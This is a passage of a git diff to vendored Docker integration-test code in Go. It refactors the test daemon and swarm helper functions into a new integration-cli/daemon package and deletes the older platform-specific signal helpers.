prependHostArg(args []string) []string { - for _, arg := range args { - if arg == "--host" || arg == "-H" { - return args - } - } - return append([]string{"--host", d.sock()}, args...) -} - -// SockRequest executes a socket request on a daemon and returns statuscode and output. 
-func (d *Daemon) SockRequest(method, endpoint string, data interface{}) (int, []byte, error) { - jsonData := bytes.NewBuffer(nil) - if err := json.NewEncoder(jsonData).Encode(data); err != nil { - return -1, nil, err - } - - res, body, err := d.SockRequestRaw(method, endpoint, jsonData, "application/json") - if err != nil { - return -1, nil, err - } - b, err := readBody(body) - return res.StatusCode, b, err -} - -// SockRequestRaw executes a socket request on a daemon and returns an http -// response and a reader for the output data. -func (d *Daemon) SockRequestRaw(method, endpoint string, data io.Reader, ct string) (*http.Response, io.ReadCloser, error) { - return sockRequestRawToDaemon(method, endpoint, data, ct, d.sock()) -} - -// LogFileName returns the path the the daemon's log file -func (d *Daemon) LogFileName() string { - return d.logFile.Name() -} - -func (d *Daemon) getIDByName(name string) (string, error) { - return d.inspectFieldWithError(name, "Id") -} - -func (d *Daemon) activeContainers() (ids []string) { - out, _ := d.Cmd("ps", "-q") - for _, id := range strings.Split(out, "\n") { - if id = strings.TrimSpace(id); id != "" { - ids = append(ids, id) - } - } - return -} - -func (d *Daemon) inspectFilter(name, filter string) (string, error) { - format := fmt.Sprintf("{{%s}}", filter) - out, err := d.Cmd("inspect", "-f", format, name) - if err != nil { - return "", fmt.Errorf("failed to inspect %s: %s", name, out) - } - return strings.TrimSpace(out), nil -} - -func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { - return d.inspectFilter(name, fmt.Sprintf(".%s", field)) -} - -func (d *Daemon) findContainerIP(id string) string { - out, err := d.Cmd("inspect", fmt.Sprintf("--format='{{ .NetworkSettings.Networks.bridge.IPAddress }}'"), id) - if err != nil { - d.c.Log(err) - } - return strings.Trim(out, " \r\n'") -} - -func (d *Daemon) buildImageWithOut(name, dockerfile string, useCache bool, buildFlags ...string) (string, int, 
error) { - buildCmd := buildImageCmdWithHost(name, dockerfile, d.sock(), useCache, buildFlags...) - return runCommandWithOutput(buildCmd) -} - -func (d *Daemon) checkActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { - out, err := d.Cmd("ps", "-q") - c.Assert(err, checker.IsNil) - if len(strings.TrimSpace(out)) == 0 { - return 0, nil - } - return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) -} - -func (d *Daemon) reloadConfig() error { - if d.cmd == nil || d.cmd.Process == nil { - return fmt.Errorf("daemon is not running") - } - - errCh := make(chan error) - started := make(chan struct{}) - go func() { - _, body, err := sockRequestRawToDaemon("GET", "/events", nil, "", d.sock()) - close(started) - if err != nil { - errCh <- err - } - defer body.Close() - dec := json.NewDecoder(body) - for { - var e events.Message - if err := dec.Decode(&e); err != nil { - errCh <- err - return - } - if e.Type != events.DaemonEventType { - continue - } - if e.Action != "reload" { - continue - } - close(errCh) // notify that we are done - return - } - }() - - <-started - if err := signalDaemonReload(d.cmd.Process.Pid); err != nil { - return fmt.Errorf("error signaling daemon reload: %v", err) - } - select { - case err := <-errCh: - if err != nil { - return fmt.Errorf("error waiting for daemon reload event: %v", err) - } - case <-time.After(30 * time.Second): - return fmt.Errorf("timeout waiting for daemon reload event") - } - return nil -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go new file mode 100644 index 0000000000..3d1fa38d5d --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon.go @@ -0,0 +1,143 @@ +package daemon // import "github.com/docker/docker/integration-cli/daemon" + +import ( + "fmt" + "strings" + "time" + + "github.com/docker/docker/integration-cli/checker" + 
"github.com/docker/docker/internal/test/daemon" + "github.com/go-check/check" + "github.com/pkg/errors" + "gotest.tools/assert" + "gotest.tools/icmd" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// Daemon represents a Docker daemon for the testing framework. +type Daemon struct { + *daemon.Daemon + dockerBinary string +} + +// New returns a Daemon instance to be used for testing. +// This will create a directory such as d123456789 in the folder specified by $DOCKER_INTEGRATION_DAEMON_DEST or $DEST. +// The daemon will not automatically start. +func New(t testingT, dockerBinary string, dockerdBinary string, ops ...func(*daemon.Daemon)) *Daemon { + ops = append(ops, daemon.WithDockerdBinary(dockerdBinary)) + d := daemon.New(t, ops...) + return &Daemon{ + Daemon: d, + dockerBinary: dockerBinary, + } +} + +// Cmd executes a docker CLI command against this daemon. +// Example: d.Cmd("version") will run docker -H unix://path/to/unix.sock version +func (d *Daemon) Cmd(args ...string) (string, error) { + result := icmd.RunCmd(d.Command(args...)) + return result.Combined(), result.Error +} + +// Command creates a docker CLI command against this daemon, to be executed later. +// Example: d.Command("version") creates a command to run "docker -H unix://path/to/unix.sock version" +func (d *Daemon) Command(args ...string) icmd.Cmd { + return icmd.Command(d.dockerBinary, d.PrependHostArg(args)...) +} + +// PrependHostArg prepend the specified arguments by the daemon host flags +func (d *Daemon) PrependHostArg(args []string) []string { + for _, arg := range args { + if arg == "--host" || arg == "-H" { + return args + } + } + return append([]string{"--host", d.Sock()}, args...) 
+} + +// GetIDByName returns the ID of an object (container, volume, …) given its name +func (d *Daemon) GetIDByName(name string) (string, error) { + return d.inspectFieldWithError(name, "Id") +} + +// InspectField returns the field filter by 'filter' +func (d *Daemon) InspectField(name, filter string) (string, error) { + return d.inspectFilter(name, filter) +} + +func (d *Daemon) inspectFilter(name, filter string) (string, error) { + format := fmt.Sprintf("{{%s}}", filter) + out, err := d.Cmd("inspect", "-f", format, name) + if err != nil { + return "", errors.Errorf("failed to inspect %s: %s", name, out) + } + return strings.TrimSpace(out), nil +} + +func (d *Daemon) inspectFieldWithError(name, field string) (string, error) { + return d.inspectFilter(name, fmt.Sprintf(".%s", field)) +} + +// CheckActiveContainerCount returns the number of active containers +// FIXME(vdemeester) should re-use ActivateContainers in some way +func (d *Daemon) CheckActiveContainerCount(c *check.C) (interface{}, check.CommentInterface) { + out, err := d.Cmd("ps", "-q") + c.Assert(err, checker.IsNil) + if len(strings.TrimSpace(out)) == 0 { + return 0, nil + } + return len(strings.Split(strings.TrimSpace(out), "\n")), check.Commentf("output: %q", string(out)) +} + +// WaitRun waits for a container to be running for 10s +func (d *Daemon) WaitRun(contID string) error { + args := []string{"--host", d.Sock()} + return WaitInspectWithArgs(d.dockerBinary, contID, "{{.State.Running}}", "true", 10*time.Second, args...) +} + +// WaitInspectWithArgs waits for the specified expression to be equals to the specified expected string in the given time. +// Deprecated: use cli.WaitCmd instead +func WaitInspectWithArgs(dockerBinary, name, expr, expected string, timeout time.Duration, arg ...string) error { + after := time.After(timeout) + + args := append(arg, "inspect", "-f", expr, name) + for { + result := icmd.RunCommand(dockerBinary, args...) 
+ if result.Error != nil { + if !strings.Contains(strings.ToLower(result.Stderr()), "no such") { + return errors.Errorf("error executing docker inspect: %v\n%s", + result.Stderr(), result.Stdout()) + } + select { + case <-after: + return result.Error + default: + time.Sleep(10 * time.Millisecond) + continue + } + } + + out := strings.TrimSpace(result.Stdout()) + if out == expected { + break + } + + select { + case <-after: + return errors.Errorf("condition \"%q == %q\" not true in time (%v)", out, expected, timeout) + default: + } + + time.Sleep(100 * time.Millisecond) + } + return nil +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go new file mode 100644 index 0000000000..4a6ce8a5c5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/daemon/daemon_swarm.go @@ -0,0 +1,197 @@ +package daemon // import "github.com/docker/docker/integration-cli/daemon" + +import ( + "context" + "fmt" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/client" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" + "gotest.tools/assert" +) + +// CheckServiceTasksInState returns the number of tasks with a matching state, +// and optional message substring. 
+func (d *Daemon) CheckServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if message == "" || strings.Contains(task.Status.Message, message) { + count++ + } + } + } + return count, nil + } +} + +// CheckServiceTasksInStateWithError returns the number of tasks with a matching state, +// and optional message substring. +func (d *Daemon) CheckServiceTasksInStateWithError(service string, state swarm.TaskState, errorMessage string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + var count int + for _, task := range tasks { + if task.Status.State == state { + if errorMessage == "" || strings.Contains(task.Status.Err, errorMessage) { + count++ + } + } + } + return count, nil + } +} + +// CheckServiceRunningTasks returns the number of running tasks for the specified service +func (d *Daemon) CheckServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return d.CheckServiceTasksInState(service, swarm.TaskStateRunning, "") +} + +// CheckServiceUpdateState returns the current update state for the specified service +func (d *Daemon) CheckServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + service := d.GetService(c, service) + if service.UpdateStatus == nil { + return "", nil + } + return service.UpdateStatus.State, nil + } +} + +// CheckPluginRunning returns the runtime state of the plugin +func (d *Daemon) CheckPluginRunning(plugin string) func(c *check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) 
{ + apiclient, err := d.NewClient() + assert.NilError(c, err) + resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin) + if client.IsErrNotFound(err) { + return false, check.Commentf("%v", err) + } + assert.NilError(c, err) + return resp.Enabled, check.Commentf("%+v", resp) + } +} + +// CheckPluginImage returns the runtime state of the plugin +func (d *Daemon) CheckPluginImage(plugin string) func(c *check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + apiclient, err := d.NewClient() + assert.NilError(c, err) + resp, _, err := apiclient.PluginInspectWithRaw(context.Background(), plugin) + if client.IsErrNotFound(err) { + return false, check.Commentf("%v", err) + } + assert.NilError(c, err) + return resp.PluginReference, check.Commentf("%+v", resp) + } +} + +// CheckServiceTasks returns the number of tasks for the specified service +func (d *Daemon) CheckServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { + return func(c *check.C) (interface{}, check.CommentInterface) { + tasks := d.GetServiceTasks(c, service) + return len(tasks), nil + } +} + +// CheckRunningTaskNetworks returns the number of times each network is referenced from a task. +func (d *Daemon) CheckRunningTaskNetworks(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + c.Assert(err, checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + for _, network := range task.Spec.Networks { + result[network.Target]++ + } + } + return result, nil +} + +// CheckRunningTaskImages returns the times each image is running as a task. 
+func (d *Daemon) CheckRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + c.Assert(err, checker.IsNil) + + result := make(map[string]int) + for _, task := range tasks { + if task.Status.State == swarm.TaskStateRunning && task.Spec.ContainerSpec != nil { + result[task.Spec.ContainerSpec.Image]++ + } + } + return result, nil +} + +// CheckNodeReadyCount returns the number of ready node on the swarm +func (d *Daemon) CheckNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { + nodes := d.ListNodes(c) + var readyCount int + for _, node := range nodes { + if node.Status.State == swarm.NodeStateReady { + readyCount++ + } + } + return readyCount, nil +} + +// CheckLocalNodeState returns the current swarm node state +func (d *Daemon) CheckLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { + info := d.SwarmInfo(c) + return info.LocalNodeState, nil +} + +// CheckControlAvailable returns the current swarm control available +func (d *Daemon) CheckControlAvailable(c *check.C) (interface{}, check.CommentInterface) { + info := d.SwarmInfo(c) + c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) + return info.ControlAvailable, nil +} + +// CheckLeader returns whether there is a leader on the swarm or not +func (d *Daemon) CheckLeader(c *check.C) (interface{}, check.CommentInterface) { + cli, err := d.NewClient() + c.Assert(err, checker.IsNil) + defer cli.Close() + + errList := check.Commentf("could not get node list") + + ls, err := cli.NodeList(context.Background(), types.NodeListOptions{}) + if err != nil { + return err, errList + } + + for _, node := range ls { + if node.ManagerStatus != nil && node.ManagerStatus.Leader { + 
return nil, nil + } + } + return fmt.Errorf("no leader"), check.Commentf("could not find leader") +} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go deleted file mode 100644 index 199bce0e7b..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm.go +++ /dev/null @@ -1,419 +0,0 @@ -package main - -import ( - "encoding/json" - "fmt" - "net/http" - "strings" - "time" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/filters" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -// SwarmDaemon is a test daemon with helpers for participating in a swarm. -type SwarmDaemon struct { - *Daemon - swarm.Info - port int - listenAddr string -} - -// Init initializes a new swarm cluster. -func (d *SwarmDaemon) Init(req swarm.InitRequest) error { - if req.ListenAddr == "" { - req.ListenAddr = d.listenAddr - } - status, out, err := d.SockRequest("POST", "/swarm/init", req) - if status != http.StatusOK { - return fmt.Errorf("initializing swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - return fmt.Errorf("initializing swarm: %v", err) - } - info, err := d.info() - if err != nil { - return err - } - d.Info = info - return nil -} - -// Join joins a daemon to an existing cluster. -func (d *SwarmDaemon) Join(req swarm.JoinRequest) error { - if req.ListenAddr == "" { - req.ListenAddr = d.listenAddr - } - status, out, err := d.SockRequest("POST", "/swarm/join", req) - if status != http.StatusOK { - return fmt.Errorf("joining swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - return fmt.Errorf("joining swarm: %v", err) - } - info, err := d.info() - if err != nil { - return err - } - d.Info = info - return nil -} - -// Leave forces daemon to leave current cluster. 
-func (d *SwarmDaemon) Leave(force bool) error { - url := "/swarm/leave" - if force { - url += "?force=1" - } - status, out, err := d.SockRequest("POST", url, nil) - if status != http.StatusOK { - return fmt.Errorf("leaving swarm: invalid statuscode %v, %q", status, out) - } - if err != nil { - err = fmt.Errorf("leaving swarm: %v", err) - } - return err -} - -func (d *SwarmDaemon) info() (swarm.Info, error) { - var info struct { - Swarm swarm.Info - } - status, dt, err := d.SockRequest("GET", "/info", nil) - if status != http.StatusOK { - return info.Swarm, fmt.Errorf("get swarm info: invalid statuscode %v", status) - } - if err != nil { - return info.Swarm, fmt.Errorf("get swarm info: %v", err) - } - if err := json.Unmarshal(dt, &info); err != nil { - return info.Swarm, err - } - return info.Swarm, nil -} - -type serviceConstructor func(*swarm.Service) -type nodeConstructor func(*swarm.Node) -type specConstructor func(*swarm.Spec) - -func (d *SwarmDaemon) createService(c *check.C, f ...serviceConstructor) string { - var service swarm.Service - for _, fn := range f { - fn(&service) - } - status, out, err := d.SockRequest("POST", "/services/create", service.Spec) - - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) - - var scr types.ServiceCreateResponse - c.Assert(json.Unmarshal(out, &scr), checker.IsNil) - return scr.ID -} - -func (d *SwarmDaemon) getService(c *check.C, id string) *swarm.Service { - var service swarm.Service - status, out, err := d.SockRequest("GET", "/services/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &service), checker.IsNil) - return &service -} - -func (d *SwarmDaemon) getServiceTasks(c *check.C, service string) []swarm.Task { - var tasks []swarm.Task - - filterArgs := filters.NewArgs() - 
filterArgs.Add("desired-state", "running") - filterArgs.Add("service", service) - filters, err := filters.ToParam(filterArgs) - c.Assert(err, checker.IsNil) - - status, out, err := d.SockRequest("GET", "/tasks?filters="+filters, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) - return tasks -} - -func (d *SwarmDaemon) checkServiceTasksInState(service string, state swarm.TaskState, message string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - tasks := d.getServiceTasks(c, service) - var count int - for _, task := range tasks { - if task.Status.State == state { - if message == "" || strings.Contains(task.Status.Message, message) { - count++ - } - } - } - return count, nil - } -} - -func (d *SwarmDaemon) checkServiceRunningTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { - return d.checkServiceTasksInState(service, swarm.TaskStateRunning, "") -} - -func (d *SwarmDaemon) checkServiceUpdateState(service string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - service := d.getService(c, service) - return service.UpdateStatus.State, nil - } -} - -func (d *SwarmDaemon) checkServiceTasks(service string) func(*check.C) (interface{}, check.CommentInterface) { - return func(c *check.C) (interface{}, check.CommentInterface) { - tasks := d.getServiceTasks(c, service) - return len(tasks), nil - } -} - -func (d *SwarmDaemon) checkRunningTaskImages(c *check.C) (interface{}, check.CommentInterface) { - var tasks []swarm.Task - - filterArgs := filters.NewArgs() - filterArgs.Add("desired-state", "running") - filters, err := filters.ToParam(filterArgs) - c.Assert(err, checker.IsNil) - - status, out, err := d.SockRequest("GET", 
"/tasks?filters="+filters, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &tasks), checker.IsNil) - - result := make(map[string]int) - for _, task := range tasks { - if task.Status.State == swarm.TaskStateRunning { - result[task.Spec.ContainerSpec.Image]++ - } - } - return result, nil -} - -func (d *SwarmDaemon) checkNodeReadyCount(c *check.C) (interface{}, check.CommentInterface) { - nodes := d.listNodes(c) - var readyCount int - for _, node := range nodes { - if node.Status.State == swarm.NodeStateReady { - readyCount++ - } - } - return readyCount, nil -} - -func (d *SwarmDaemon) getTask(c *check.C, id string) swarm.Task { - var task swarm.Task - - status, out, err := d.SockRequest("GET", "/tasks/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &task), checker.IsNil) - return task -} - -func (d *SwarmDaemon) updateService(c *check.C, service *swarm.Service, f ...serviceConstructor) { - for _, fn := range f { - fn(service) - } - url := fmt.Sprintf("/services/%s/update?version=%d", service.ID, service.Version.Index) - status, out, err := d.SockRequest("POST", url, service.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) removeService(c *check.C, id string) { - status, out, err := d.SockRequest("DELETE", "/services/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) getNode(c *check.C, id string) *swarm.Node { - var node swarm.Node - status, out, err := d.SockRequest("GET", "/nodes/"+id, nil) - c.Assert(err, 
checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &node), checker.IsNil) - c.Assert(node.ID, checker.Equals, id) - return &node -} - -func (d *SwarmDaemon) removeNode(c *check.C, id string, force bool) { - url := "/nodes/" + id - if force { - url += "?force=1" - } - - status, out, err := d.SockRequest("DELETE", url, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) updateNode(c *check.C, id string, f ...nodeConstructor) { - for i := 0; ; i++ { - node := d.getNode(c, id) - for _, fn := range f { - fn(node) - } - url := fmt.Sprintf("/nodes/%s/update?version=%d", node.ID, node.Version.Index) - status, out, err := d.SockRequest("POST", url, node.Spec) - if i < 10 && strings.Contains(string(out), "update out of sequence") { - time.Sleep(100 * time.Millisecond) - continue - } - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - return - } -} - -func (d *SwarmDaemon) listNodes(c *check.C) []swarm.Node { - status, out, err := d.SockRequest("GET", "/nodes", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - nodes := []swarm.Node{} - c.Assert(json.Unmarshal(out, &nodes), checker.IsNil) - return nodes -} - -func (d *SwarmDaemon) listServices(c *check.C) []swarm.Service { - status, out, err := d.SockRequest("GET", "/services", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - services := []swarm.Service{} - c.Assert(json.Unmarshal(out, &services), checker.IsNil) - return services -} - -func (d *SwarmDaemon) 
createSecret(c *check.C, secretSpec swarm.SecretSpec) string { - status, out, err := d.SockRequest("POST", "/secrets/create", secretSpec) - - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusCreated, check.Commentf("output: %q", string(out))) - - var scr types.SecretCreateResponse - c.Assert(json.Unmarshal(out, &scr), checker.IsNil) - return scr.ID -} - -func (d *SwarmDaemon) listSecrets(c *check.C) []swarm.Secret { - status, out, err := d.SockRequest("GET", "/secrets", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - - secrets := []swarm.Secret{} - c.Assert(json.Unmarshal(out, &secrets), checker.IsNil) - return secrets -} - -func (d *SwarmDaemon) getSecret(c *check.C, id string) *swarm.Secret { - var secret swarm.Secret - status, out, err := d.SockRequest("GET", "/secrets/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &secret), checker.IsNil) - return &secret -} - -func (d *SwarmDaemon) deleteSecret(c *check.C, id string) { - status, out, err := d.SockRequest("DELETE", "/secrets/"+id, nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusNoContent, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) getSwarm(c *check.C) swarm.Swarm { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - return sw -} - -func (d *SwarmDaemon) updateSwarm(c *check.C, f ...specConstructor) { - sw := d.getSwarm(c) - for _, fn := range f { - fn(&sw.Spec) - } - url := 
fmt.Sprintf("/swarm/update?version=%d", sw.Version.Index) - status, out, err := d.SockRequest("POST", url, sw.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) rotateTokens(c *check.C) { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - - url := fmt.Sprintf("/swarm/update?version=%d&rotateWorkerToken=true&rotateManagerToken=true", sw.Version.Index) - status, out, err = d.SockRequest("POST", url, sw.Spec) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) -} - -func (d *SwarmDaemon) joinTokens(c *check.C) swarm.JoinTokens { - var sw swarm.Swarm - status, out, err := d.SockRequest("GET", "/swarm", nil) - c.Assert(err, checker.IsNil, check.Commentf(string(out))) - c.Assert(status, checker.Equals, http.StatusOK, check.Commentf("output: %q", string(out))) - c.Assert(json.Unmarshal(out, &sw), checker.IsNil) - return sw.JoinTokens -} - -func (d *SwarmDaemon) checkLocalNodeState(c *check.C) (interface{}, check.CommentInterface) { - info, err := d.info() - c.Assert(err, checker.IsNil) - return info.LocalNodeState, nil -} - -func (d *SwarmDaemon) checkControlAvailable(c *check.C) (interface{}, check.CommentInterface) { - info, err := d.info() - c.Assert(err, checker.IsNil) - c.Assert(info.LocalNodeState, checker.Equals, swarm.LocalNodeStateActive) - return info.ControlAvailable, nil -} - -func (d *SwarmDaemon) checkLeader(c *check.C) (interface{}, check.CommentInterface) { - errList := check.Commentf("could not get node list") - status, out, err := d.SockRequest("GET", "/nodes", nil) - if err != nil { - 
return err, errList - } - if status != http.StatusOK { - return fmt.Errorf("expected http status OK, got: %d", status), errList - } - - var ls []swarm.Node - if err := json.Unmarshal(out, &ls); err != nil { - return err, errList - } - - for _, node := range ls { - if node.ManagerStatus != nil && node.ManagerStatus.Leader { - return nil, nil - } - } - return fmt.Errorf("no leader"), check.Commentf("could not find leader") -} - -func (d *SwarmDaemon) cmdRetryOutOfSequence(args ...string) (string, error) { - for i := 0; ; i++ { - out, err := d.Cmd(args...) - if err != nil { - if strings.Contains(out, "update out of sequence") { - if i < 10 { - continue - } - } - } - return out, err - } -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go similarity index 77% rename from vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go rename to vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go index 0cea901420..7a23e84bfc 100644 --- a/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack.go +++ b/vendor/github.com/docker/docker/integration-cli/daemon_swarm_hack_test.go @@ -1,12 +1,15 @@ package main -import "github.com/go-check/check" +import ( + "github.com/docker/docker/integration-cli/daemon" + "github.com/go-check/check" +) -func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *SwarmDaemon { +func (s *DockerSwarmSuite) getDaemon(c *check.C, nodeID string) *daemon.Daemon { s.daemonsLock.Lock() defer s.daemonsLock.Unlock() for _, d := range s.daemons { - if d.NodeID == nodeID { + if d.NodeID() == nodeID { return d } } diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go b/vendor/github.com/docker/docker/integration-cli/daemon_unix.go deleted file mode 100644 index 6ca7daf21c..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_unix.go +++ /dev/null @@ -1,35 +0,0 @@ -// 
+build !windows - -package main - -import ( - "os" - "path/filepath" - "syscall" - - "github.com/go-check/check" -) - -func cleanupExecRoot(c *check.C, execRoot string) { - // Cleanup network namespaces in the exec root of this - // daemon because this exec root is specific to this - // daemon instance and has no chance of getting - // cleaned up when a new daemon is instantiated with a - // new exec root. - netnsPath := filepath.Join(execRoot, "netns") - filepath.Walk(netnsPath, func(path string, info os.FileInfo, err error) error { - if err := syscall.Unmount(path, syscall.MNT_FORCE); err != nil { - c.Logf("unmount of %s failed: %v", path, err) - } - os.Remove(path) - return nil - }) -} - -func signalDaemonDump(pid int) { - syscall.Kill(pid, syscall.SIGQUIT) -} - -func signalDaemonReload(pid int) error { - return syscall.Kill(pid, syscall.SIGHUP) -} diff --git a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go b/vendor/github.com/docker/docker/integration-cli/daemon_windows.go deleted file mode 100644 index 885b703b33..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/daemon_windows.go +++ /dev/null @@ -1,53 +0,0 @@ -package main - -import ( - "fmt" - "strconv" - "syscall" - "unsafe" - - "github.com/go-check/check" - "golang.org/x/sys/windows" -) - -func openEvent(desiredAccess uint32, inheritHandle bool, name string, proc *windows.LazyProc) (handle syscall.Handle, err error) { - namep, _ := syscall.UTF16PtrFromString(name) - var _p2 uint32 - if inheritHandle { - _p2 = 1 - } - r0, _, e1 := proc.Call(uintptr(desiredAccess), uintptr(_p2), uintptr(unsafe.Pointer(namep))) - handle = syscall.Handle(r0) - if handle == syscall.InvalidHandle { - err = e1 - } - return -} - -func pulseEvent(handle syscall.Handle, proc *windows.LazyProc) (err error) { - r0, _, _ := proc.Call(uintptr(handle)) - if r0 != 0 { - err = syscall.Errno(r0) - } - return -} - -func signalDaemonDump(pid int) { - modkernel32 := windows.NewLazySystemDLL("kernel32.dll") - 
